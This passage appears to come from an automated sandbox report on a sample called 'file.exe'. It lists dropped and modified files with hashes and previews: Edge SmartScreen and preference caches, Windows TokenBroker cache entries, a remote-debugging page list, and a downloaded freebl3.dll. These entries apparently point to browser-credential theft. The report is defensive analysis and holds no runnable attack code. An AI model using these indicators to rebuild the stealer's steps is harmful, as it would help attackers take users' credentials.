File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.023495898904847
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclU5cdYV:YWLSGTt1o9LuLgfGBPAzkVj/T8lUey
MD5:	C872017509592EB435E166D184BB44B4
SHA1:	0E5F5BA13FD0EDA982630DFC4F90B912DFFCEFB2
SHA-256:	287B2A01CDF6FFCC0A15098C8910035217F937A3EAA968F44B5900D9EA53ED87
SHA-512:	B7FDD1356699059053D501150B5485DB3AD834B55CA00DBD30F22C59313F5B174098311404F33DBB8E1B978C5C77EE523A1DB6F80B553C21E924BC2722E4AEBA
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1731418398935850}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a5e9fa63-fbce-44d6-aa60-80d0668a841e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44698
Entropy (8bit):	6.0961552091626885
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkBEwuuhDO6vP6O5iufu7kRnhPqz6VcGoup1Xl3jVz6:z/Ps+wsI7yOEC6Ewchu3VlXr4CRo1
MD5:	E89CC8614658E3836464898A596C12A1
SHA1:	5840949681557CAA40FF89D00C4BD64736B6336C
SHA-256:	EE2409FF603454BF88E7666C56309D1F273B0B6A4EDCB0086CBD1B416336EEF4
SHA-512:	F836CAA93FA454ECA4EC76D604BC9019BA09ED579599E15375B8264AB7C9D4B59343D345880F603FC48F1924233FDECE70B8C548ADA1CDC3C7F4B5BA84F8C4CA
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b17118a4-b537-4645-84f4-e7941672b598.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44616
Entropy (8bit):	6.096645375036409
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBUwuuhDO6vP6O5iufGf+kWPFI+cGoup1Xl3jVzXr2:z/Ps+wsI7ynES6Egchu3VlXr4CRo1
MD5:	B18CA88DBE8ACF9FCCB8C4FA2D951464
SHA1:	DAA46B77B14F7045AAC231D0E09B7EE815E54B98
SHA-256:	983B16408F0023A866FFEBB46E9BC8DF75CA877C0FD3C56622BB5D22F33973CF
SHA-512:	8AA742D197F0458E1857298ADEDE4F1D8FD58821B6C14D8B676D5CF668409CC406B3A5CC8C521F49662CBF7459208C974E2812A41304A8E12E699DF7C4E9E7B7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cd8e791a-8c52-49f7-86d6-63a0e96b15fc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45882
Entropy (8bit):	6.087692222042444
Encrypted:	false
SSDEEP:	768:QMkbJrT8IeQcrQgx9gVouXhDO6vP6O5iufu7kRnhPqz6VcpYL+CAobGoup1Xl3jG:QMk1rT8HR9gQ6Ewcp1Robhu3VlXr43
MD5:	D111D6F6585D8F3AF0E3B54D0A2E97F8
SHA1:	73BD06656F7FF3941501D58CA4A0A00D0CF9D115
SHA-256:	671A6CE54665CAE78DDBCED4E7CC85B6BF7CB2F5AF2FE0E69EF4E1DC2D87A907
SHA-512:	FEF1588CD2E0147BD84535F5A0D256339F94295AE4BC6E443B771E670C0AB29A60A8D2D8C641F11F8B6248126F39CFA660D7790E6024DF564A8CBB534CC45F4D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1731317600"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8463598631715428
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxAuxl9Il8uo905pSXyGOWlf32Yhdd1rc:mOYi05pSXyHWlf2Yhm
MD5:	F57F26356596DFA58E3FF23425DB9189
SHA1:	AA6530FA5CA7AAD2CBE7D3539C80891A8DAC922E
SHA-256:	9EFC7C6D6F1ADAEFF9070050CDD9BE491ABB899D0CEFA10D52D212FF0025232E
SHA-512:	322D3F368C5FDFE6A90077555E4849F5B498FF33EA90E6CD1B60A8059305D313773AAB7CC24ADB9C34BA4CBEFBD83F7EA940F72AE541787E8D234A1CCF1BDFDA
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.E.H.U.H.y.U.0.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.I.S.g.b.T.e.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	3.9894072102357474
Encrypted:	false
SSDEEP:	96:fYPOVrIsMjcKkS0TNEutxHpl42ksRATtOq4rHXJhoaV6nS:foOWsMCSI5rM2ks20q4rXJp
MD5:	F63B11BEA11C02FD161F4504D9873585
SHA1:	FAEADBF0D4ABDC3B4A58CEDC5ED9ABEB61455791
SHA-256:	5F6B575B5E523EC0DD8DA64B89A56AAC0A14BCC27FCE29BA3FA5877DFB854A92
SHA-512:	EED8DD15C417DB8E7095261CC1906692073795598F0EA04BED5A1F6CB6F5F2CD5D0D8311CE99C796D06B4CDACB9B8D622C38C523032182F6E62CB5FAACD67AA9
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".e.a./.V.B.R.0.0.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.I.S.g.b.T.e.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.896469139479006
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7xmxl9Il8uIx4mZUyPZepP3TuN6BMIed/vc:aMYKxPN47JB9
MD5:	10B61D80EF1AA989B9261B1561D8DA83
SHA1:	01FDABE6B5ADD05E88D435B99A853C7CF9DCFBC1
SHA-256:	2EC5620D37AF9DC7FB673A515DA7FEAA5060B29B63E7F4430BA32B34CFAD9329
SHA-512:	AB928E6EBD0FD90878F2B0ABB0E1C51BE9F75DEA194F39E74462F2CDF3BB07C95472FB28D81EFD3DABC523BF82B29168E5C05067815CC2F4D6DBFF251843A33E
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".B.R.F.h.N.e.5.S.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.I.S.g.b.T.e.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3500
Entropy (8bit):	5.398020070690834
Encrypted:	false
SSDEEP:	96:6NnQKHQNNnQgbQJNnQo9Q4NnQRdgEQaNnQMQqNnQUooDQULNnQcwQ1NnQJ3Q4:6NaN8NdNIPNdNx1NbxNe
MD5:	558B7D9ACCDA268C8F423319D4220A9F
SHA1:	A6034B0B5F7A081840AE1FBE9C69C0E832DC56ED
SHA-256:	C5D5EEB95ED7B2089E7F35CF5C2E8B81BE0FE7AEE32FE87B6767687C5E1F09AA
SHA-512:	88817ECFD0EE3DEBC3AD5A47C0205535572B5AE1D5510F3D725D2422045919BACCC840EC0CED7B3C9CE1A176DF2D0B69E9A30D8CCD4BBB26E33F3770012531EB
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/226E0C6C03E880ABC556C314DC1C5EF1",.. "id": "226E0C6C03E880ABC556C314DC1C5EF1",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/226E0C6C03E880ABC556C314DC1C5EF1"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/A88F158013B671243625B0638FED1A43",.. "id": "A88F158013B671243625B0638FED1A43",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/A88F158013B671243625B0638FED1A43"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.366487579186208
Encrypted:	false
SSDEEP:	48:SfNaoQ5TEQHfNaoQys2QyJfNaoQRo2QRWfNaoQDFY0UrU0U8QD9:6NnQ5TEQ/NnQys2QylNnQRo2QR+NnQDr
MD5:	3612E81B39DD1C28A2876DB3FC3C51A6
SHA1:	2853E3E0A1E703E4B4A213FA85F8BD788012E0B4
SHA-256:	5227895F0E9979CC1244CD7C49029D6DBE54ECDC02D29ECEEE4FF5885C246564
SHA-512:	E432B02AA6E705D8E041C35CEDFBAE9DD354E4F2D47974FC724DEC464327D513709DE0DCD61FD4B9B1542F8DBEE22474CAEB27BC7C02670C4A4B5872B6A69848
Malicious:	false
